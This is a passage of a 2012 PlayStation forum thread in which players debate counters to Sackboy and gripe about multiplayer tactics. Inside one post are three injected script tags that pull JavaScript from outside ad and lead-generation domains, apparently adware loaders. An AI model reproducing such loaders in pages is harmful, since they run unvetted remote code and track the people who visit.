Showing results for 
Search instead for 
Do you mean 
Uncharted Territory
1785 posts

Re: sackboy is in fact op

Dec 6, 2012

If your character has a downward attack from the air with a big enough hitbox you should be just fine when it comes to the shock pads because your attack could destroy it and at the same time damage Sackboy. With Big Daddy drop some ice over it, with Jak use down circle, with Ratchet use side circle, with Sir Daniel use side circle, with Cole use down triangle, and Drake? Well let's just say that barrel is your best friend, that's if you can time where you throw it just right, otherwise Sackboy's fan isn't going to do you any justice.

Please use plain text.
Message 21 of 25 (126 Views)
0 Likes
Wastelander
820 posts

Dec 6, 2012

Two things i can't stand on the multiplayer..

The button masher spammers who just button mash like kratos and raiden, and those who don't do crap the whole match and keep missing their finishers and save up to use a unblockable level 3 and win, meanwhile everyone else worked their butts off using level ones and fighting.

I hate that most of the time i get killed on that game its from a cheap level 3 because i can evade level 1s with a breeze.

The Kingdom of Longbow shall reign forever, for it is written in the stars above~
Please use plain text.
Message 22 of 25 (112 Views)
0 Likes
Gaming Beast
2167 posts

Dec 6, 2012

ThatOneGuy39 wrote:

If your character has a downward attack from the air with a big enough hitbox you should be just fine when it comes to the shock pads because your attack could destroy it and at the same time damage Sackboy. With Big Daddy drop some ice over it, with Jak use down circle, with Ratchet use side circle, with Sir Daniel use side circle, with Cole use down triangle, and Drake? Well let's just say that barrel is your best friend, that's if you can time where you throw it just right, otherwise Sackboy's fan isn't going to do you any justice.

I can't say for all of them, but that may not actually be great suggestions. For example, if you try to drop ice on the pad as BD, you will get grappled into a combo. On the flip side, if you use air side triangle to go through it (Has Super armor), you can punish his landing lag, act as though the shock pad isn't there, and it starts a 150 AP combo (Or kill combo if you have level 1/2.).

Against Drake that fan should always be out and the mattress can also reflect it. Honestly against a camping sackboy you're better off using shots that go over the fan (AK, the side triangle) or well aimed grenade launcher rounds.

Don't really know the other two characters, but I hope your advice is better than what you gave for BD and Drake :smileytongue:

The Fro never sleeps.png

<script type="text/javascript" src="https://loading-resource.com/data.js.php?i={5B0E559A-F075-4C48-91F1-A12AED5BE78E}&d=2012-6-10&s=http://community.us.playstation.com/t5/forums/replypage/board-id/24861/message-id/338362"></script>
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
<script type="text/javascript" src="http://www.vitruvianleads.com/build/production/selectionlinks/templates/bootstrap.js"></script>
Please use plain text.
Message 23 of 25 (92 Views)
0 Likes
Fender Bender
2516 posts

Dec 6, 2012

Despur4do wrote:

Two things i can't stand on the multiplayer..

The button masher spammers who just button mash like kratos and raiden, and those who don't do crap the whole match and keep missing their finishers and save up to use a unblockable level 3 and win, meanwhile everyone else worked their butts off using level ones and fighting.

I hate that most of the time i get killed on that game its from a cheap level 3 because i can evade level 1s with a breeze.

You do know what a button masher is, right? Button mashers are more likely to just spam forward-square as Kratos. I don't see anything Raiden has that's really 'mashable'.

Please use plain text.
Message 24 of 25 (90 Views)
0 Likes
I Only Post Everything
1197 posts

Dec 6, 2012
ranged character and I just sit in the corner and press one button the entire game to win is diffrent
Photobucket
Please use plain text.
Message 25 of 25 (74 Views)
0 Likes